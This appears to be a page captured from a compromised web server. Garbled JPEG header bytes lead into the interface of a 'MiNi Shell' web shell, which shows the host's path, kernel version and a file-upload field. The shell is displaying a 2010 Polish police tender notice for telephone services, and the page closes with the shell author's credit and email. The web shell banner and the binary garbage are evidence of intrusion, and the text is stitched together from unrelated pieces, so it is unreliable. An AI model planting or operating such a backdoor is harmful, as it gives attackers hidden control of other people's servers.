JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100126/16831-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług telefonicznych w zakresie połączeń wychodzących i przychodzących dla wybranych służb i jednostek Policji województwa lubuskiego - analogowe telefony miejskie.</b><br>
<b>Numer ogłoszenia: 16831 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7211420, faks 095 7211455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telefonicznych w zakresie połączeń wychodzących i przychodzących dla wybranych służb i jednostek Policji województwa lubuskiego - analogowe telefony miejskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. W Specyfikacji Istotnych Warunków Zamówienia -SIWZ- są zawarte minimalne wymagania techniczne.
2. Wykonawca będzie zobowiązany do realizacji przedmiotu zamówienia, tj. do:
a) świadczenia usług  telefonicznych dla linii Zamawiającego, w zakresie połączeń wychodzących lokalnych i strefowych, międzystrefowych i międzynarodowych, a także do sieci telefonii komórkowych, generowanych z lokalizacji Zamawiającego określonych w niniejszym dokumencie.
b) świadczenia usług  telefonicznych dla Zamawiającego, w zakresie połączeń przychodzących  lokalnych i strefowych, międzystrefowych i międzynarodowych, a także  z sieci telefonii komórkowych, na numery Zamawiającego w lokalizacjach określonych w niniejszym dokumencie.
c) świadczenia usług dodatkowych takich jak: blokada połączeń wychodzących (połączenia na numery o podwyższonej opłacie), blokada prezentacji numeru  wywołującego, przekierowania  połączeń i innych usług dodatkowych będących w ofercie Wykonawcy.
3. Wykonawca będzie zobowiązany zagwarantować, że z tytułu uruchomienia usług Zamawiający nie będzie ponosił dodatkowych opłat za uzyskanie dostępu do sieci telekomunikacyjnej Wykonawcy.
4. Wykonawca zagwarantuje świadczenie usług przez czas określony, tj. przez okres 16 miesięcy oraz rozpoczęcie ich świadczenia najpóźniej w terminie 30 dni licząc od daty podpisania umowy.
5. Wykonawca będzie zobowiązany do należytego wykonania przedmiotu umowy, a w szczególności  do  zapewnienia dostępu do sieci telekomunikacyjnej Wykonawcy i świadczenia usług telekomunikacyjnych w sposób ciągły tj. codziennie przez całą dobę przez okres obowiązywania umowy z zapewnieniem wysokiej jakości połączeń tj. poprawności wybierania numerów, braku zakłóceń utrudniających lub  uniemożliwiających  korzystanie z usługi,  a ewentualne  przerwy rozliczane będą na zasadach określonych w istotnych postanowieniach umowy.
6. Wykonawca będzie zobowiązany do realizacji przedmiotu umowy zawartej w wyniku niniejszego postępowania przetargowego  z należytą starannością, zgodnie z opisem przedmiotu zamówienia, oraz wymaganiami SIWZ, przedłożoną ofertą i obowiązującymi przepisami, a  w szczególności zgodnie z postanowieniami ustawy z dnia 16 lipca 2004. Prawo telekomunikacyjne (Dz. U. Nr 171 poz.1800 ze zmianami).
7. W ramach realizacji przedmiotu zamówienia Wykonawca będzie zobowiązany do zachowania wskazanych dotychczasowych numerów stacji telefonicznych użytkowanych przez Zamawiającego, dla których realizowany jest przedmiot zamówienia. W razie konieczności Wykonawca zapewni przeniesienie tych numerów do własnej sieci, przy zapewnieniu ciągłości ich funkcjonowania (zgodnie z art. 71 ustawy z dnia 16 lipca 2004. Prawo telekomunikacyjne (Dz. U. Nr 171 poz.1800 ze zmianami). Koszt przeniesienia numerów pokryje Zamawiający. Koszt przeniesienia jednego numeru nie może być wyższy niż to wynika z cennika Wykonawcy w ofercie publicznej dla biznesu.
8. Wykonawca zagwarantuje że po zakończeniu czasu trwania umowy z Wykonawcą, przeniesienie numerów z sieci Wykonawcy do sieci innego operatora będzie dla Zamawiającego bezkosztowe.
9. W ramach usługi będącej przedmiotem zamówienia, Wykonawca  zapewni:
a) Zachowanie odpowiednich parametrów i standardów  realizowanych usług zgodnych z obowiązującymi przepisami,
b) Maksymalny  czas reakcji w wypadku  wystąpienia przerw w realizowaniu świadczonych usług  wynoszący maksymalnie jedną godzinę od czasu zgłoszenia 
c) Czas naprawy uszkodzeń wynoszący nie dłużej niż 12 godzin od momentu zgłoszenia (Wyjątek stanowi usunięcie awarii powstałej na skutek wystąpienia siły wyższej). 
d) Niezmienność cen przez okres trwania umowy.
Ceny podane w ofercie  przez Wykonawcę są cenami maksymalnymi i nie mogą być zmienione   na wyższe w trakcie obowiązywania umowy. Dopuszcza się możliwość zmiany podanych cen w trakcie trwania umowy na korzystniejsze dla Zamawiającego lecz nie powinno to nieść za sobą dodatkowych obciążeń finansowych dla Zamawiającego.
10. Wykonawca zapewni, że przez cały okres obowiązywania umowy ceny za realizowane usługi nie będą wyższe niż ceny obowiązujące w cenniku taryf biznesowych Wykonawcy.
11. Wykonawca zapewni, iż stosowane przez niego środki techniczne wykorzystywane w związku ze świadczeniem usługi  będą gwarantować bezpieczeństwo przekazu informacji w granicach możliwości technicznych.
12. Ilekroć w niniejszej SIWZ i załącznikach do SIWZ przedmiot zamówienia został określony poprzez wskazanie znaków towarowych, patentów lub pochodzenia, intencją Zamawiającego było przedstawienie typu materiału bądź technologii. W takim przypadku Zamawiający dopuszcza składanie ofert równoważnych, ale jedynie takich, które gwarantują zachowanie tych samych norm, parametrów i standardów. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest zobowiązany wykazać w formie opisowej, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego w SIWZ i jej załącznikach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek musi być spełniony przez każdego z członków Konsorcjum osobno; 
b) posiadania wiedzy i doświadczenia.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek może  być wspólnie spełniony przez  członków Konsorcjum; 
2. OPIS SPOSOBU  DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:
a) Zamawiający uzna za spełniony warunek  dotyczący posiadania uprawnień do wykonywania działalności lub czynności wówczas kiedy Wykonawca będzie wpisany do rejestru przedsiębiorców telekomunikacyjnych.
b) Zamawiający uzna za spełniony warunek  dotyczący posiadania wiedzy i doświadczenia kiedy Wykonawca wykaże, że wykonywał min. 2 usługi, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia
3. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy P.z.p.
4. Ocena spełnienia warunków udziału w postępowaniu będzie odbywała się na podstawie złożonych przez Wykonawcę dokumentów potwierdzających spełnianie postawionych warunków (spełnia/ nie spełnia) - zgodnie z drukiem ZP -17 Informacja o spełnianiu przez wykonawców warunków udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego - wzór zgodnie z załącznikiem nr 3 do Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego. Wszystkie dokumenty jakie Zamawiający wymaga na potwierdzenie spełniania warunków udziału w postępowaniu są wymienione w pkt X SIWZ. 
5. Przedsiębiorców prowadzących działalność gospodarczą w formie Spółki Cywilnej należy traktować jako wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6. W przypadku Wykonawców występujących wspólnie (Konsorcjum/Spółka Cywilna) warunki wymienione w ppkt 1) lit a) muszą być spełnione przez każdego z członków Konsorcjum/przedsiębiorców prowadzących działalność w formie Spółki Cywilnej osobno natomiast warunki wymienione w ppkt 1) lit b), członkowie Konsorcjum/ przedsiębiorców prowadzących działalność w formie Spółki Cywilnej mogą spełniać wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu wykazania spełniania warunków udziału w postępowaniu (art. 22 ust. 1 ustawy P.z.p.) oraz o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy P.z.p. i nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 2 ustawy Prawo zamówień publicznych dnia 29 stycznia 2004r. (tekst jednolity Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.) Wykonawca zobowiązany jest złożyć:
a) oświadczenie, że Wykonawca spełnia warunki art. 22 ust. 1 ustawy P.z.p. (zał. nr  1 do SIWZ); W przypadku Wykonawców występujących wspólnie w/w dokument składa każdy z Wykonawców;
b) aktualne zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych wydane na podstawie art. 11 w zw. z art. 10 ustawy z dnia 16 lipca 2004 Prawo Telekomunikacyjne (Dz. U. nr 171 poz. 1800 ze zm)
c) Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie (np. listów referencyjnych)  (wzór - załączniki nr 2 do SIWZ), zgodnie z wymaganiem Zamawiającego określonym w pkt IX ppkt 2. lit. b) -W przypadku Wykonawców występujących wspólnie, ze złożonych dokumentów musi wynikać, że  łącznie spełniają ten warunek. 
d) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust. 1 pkt. 2 ustawy. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument musi być złożony  osobno przez wszystkich wykonawców występujących wspólnie. 
2. Wykonawcy zagraniczni: 
2.1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt X ppkt. 1 lit. d) SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2.2 Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
3. Na potwierdzenie spełniana przez oferowane usługi wymagań określonych przez Zamawiającego w  SIWZ Wykonawca musi załączyć do oferty:
a) Oświadczenie dotyczące minimalnych wymagań- załącznik nr  5 do SIWZ 
4. Wykonawca musi również załączyć do oferty: 
a) prawidłowo wypełniony i podpisany przez Wykonawcę  Formularz Ofertowy (załącznik nr 3 do SIWZ), wszystkie pola puste i wykropkowane musza być wypełnione przez Wykonawcę;
b) w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do wniosku musi  być dołączone stosowne upoważnienie lub pełnomocnictwo (W FORMIE ORYGINAŁU LUB KOPII POŚWIADCZONEJ ZA ZGODNOŚĆ  Z ORYGINAŁEM PRZEZ NOTARIUSZA (SĄD OKRĘGOWY W WARSZAWIE - SYGN. AKT V CA 85/07), określające zakres czynności do których jest umocowany.
c) prawidłowo wypełnione i podpisane przez Wykonawcę lub osobę upoważnioną Oświadczenie o podwykonawcach - załączyć w przypadku udziału podwykonawców - załącznik nr 4 do  SIWZ;
d) W przypadku złożenia oferty przez spółkę cywilną należy załączyć oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę.
e) oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę (Konsorcjum), ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego (wyznaczenie lidera). W przypadku Wykonawców występujących wspólnie zastosowanie maja przepisy ustawy zawarte w art. 23 ust. 1-4 ustawy
f) Zamawiający zaleca załączyć do oferty podpisany lub zaparafowany przez Wykonawcę lub osobę uprawniona do reprezentowania Wykonawcy - Projekt Umowy - zał. Nr 6 do SIWZ (zaleca się wypełnienie projektu umowy w części dotyczącej Wykonawcy i jego oferty.) - nie jest wymagane załączanie projektu umowy do oferty.
5. Wszystkie wymagane dokumenty muszą być dostarczone w formie oryginałów lub kserokopii poświadczonej   za zgodność z oryginałem (podpisem lub parafką) przez Wykonawcę lub osobę przez niego upoważnioną -  z zastrzeżeniem  pkt X ppkt 4 lit. b) niniejszej SIWZ.
6. Brak wymaganych w pkt X ppkt 4 lit. a); c); d); e);  SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy - po wyczerpaniu przez Zamawiającego 	możliwości wynikających z art. 87 ust. 1 i 2 ustawy).
7. Brak wymaganych w pkt X ppkt 3 i ppkt 4 lit. b) SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy P.z.p. - po wyczerpaniu możliwości uzupełnienia dok. lub wyjaśnienia treści dok. na podst. art. 26 ust. 3 i 4 ustawy P.z.p.).
8. Brak  wymaganych w pkt X ppkt 1 SIWZ dokumentów lub złożenie ich w niewłaściwej formie (np. niepoświadczenie za zgodność z oryginałem odpisu lub kopii) spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia. (zgodnie z art.24 ust 2 ustawy - po wyczerpaniu możliwości uzupełnienia dok. lub wyjaśnienia treści dok. na podst. art. 26 ust. 3 i 4 ustawy P.z.p.)
9. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą zgodnie z art. 24 ust. 4 ustawy P.z.p.
10. Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginału lub kopii notarialnie poświadczonej.
11. Oferta musi być sporządzona w języku polskim, a każdy dokument składający się na ofertę sporządzony w innym języku niż język polski powinien być złożony wraz z tłumaczeniem, przy czym wersja polskojęzyczna jest wersją wiążącą.
12. Wszystkie miejsca, w których Wykonawca naniósł zmiany muszą być parafowane przez osobę podpisującą ofertę.
13. Jeżeli oferta Wykonawców występujących wspólnie (Konsorcjum, Spółka Cywilna) zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców a w przypadku przedsiębiorców prowadzących działalność w formie Spółki Cywilnej - umowę spółki.
14. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z 	przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust.2 pkt.3 Ustawy P.z.p. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji
Sekcja ds Zamówień Publicznych
ul. Kwiatowa 10
66-400 Gorzów Wlkp..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 11:00, miejsce: Komenda Wojewódzka Policji
Sekcja ds Zamówień Publicznych
ul. Kwiatowa 10
66-400 Gorzów Wlkp..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. SPOSÓB PRZEKAZYWANIA INFORMACJI 
1. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie pisemnie, faksem lub drogą elektroniczną.(art. 27 ust. 1 Ustawy P.z.p.)
2. Zamawiający żąda od Wykonawcy potwierdzenia faktu otrzymania oświadczenia, wniosku, zawiadomienia lub informacji  wysyłanych  droga elektroniczną lub faksem. (art. 27 ust. 2 Ustawy P.z.p.).
3. Wykonawca może zwrócić się wyłącznie pisemnie do Zamawiającego o wyjaśnienie treści SIWZ zgodnie z art. 38 Ustawy P.z.p.  W przypadku rozbieżności pomiędzy treścią niniejszej SIWZ a treścią udzielonych odpowiedzi, jako obowiązującą  należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.
II. POROZUMIEWANIE SIĘ Z WYKONAWCAMI 
1. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.). w języku polskim (art. 9 ust. 2 ustawy P.z.p.)
2. Wszelkie pytania dotyczące postępowania o udzielenie zamówienia należy kierować pisemnie  - Pracownicy Sekcji ds. Zamówień Publicznych fax - (095) 7381435 lub e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub na adres: Komenda Wojewódzka Policji Sekcja ds. Zamówień Publicznych, ul. Kwiatowa 10, 66-400 Gorzów Wlkp. W przypadku dostarczenia dokumentu po godzinach urzędowania Zamawiający uzna, że zapoznał się z jego treścią w następnym dniu roboczym.
III. AUKCJA ELEKTRONICZNA - Zamawiający nie zamierza zastosować aukcji elektronicznej przy wyborze najkorzystniejszej oferty.
IV. UMOWY RAMOWE - Zamawiający nie zamierza zawrzeć umowy ramowej.
V. WYMAGANIA ZWIĄZANE Z REALIZACJĄ ZAMÓWIENIA NA PODSTAWIE ART. 29 UST. 4 USTAWY - Zamawiający nie przewiduje wymagań  o których mowa w art. 29 ust. 4 ustawy.
VI. ZALICZKA NA POCZET WYKONANIA ZAMÓWIENIA - Zamawiający nie przewiduje możliwości udzielenia zaliczki na poczet wykonania zamówienia.
VII. ZABEZPIECZENIE NALEŻYTEGO WYKONANIA UMOWY - Zamawiający nie żąda od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com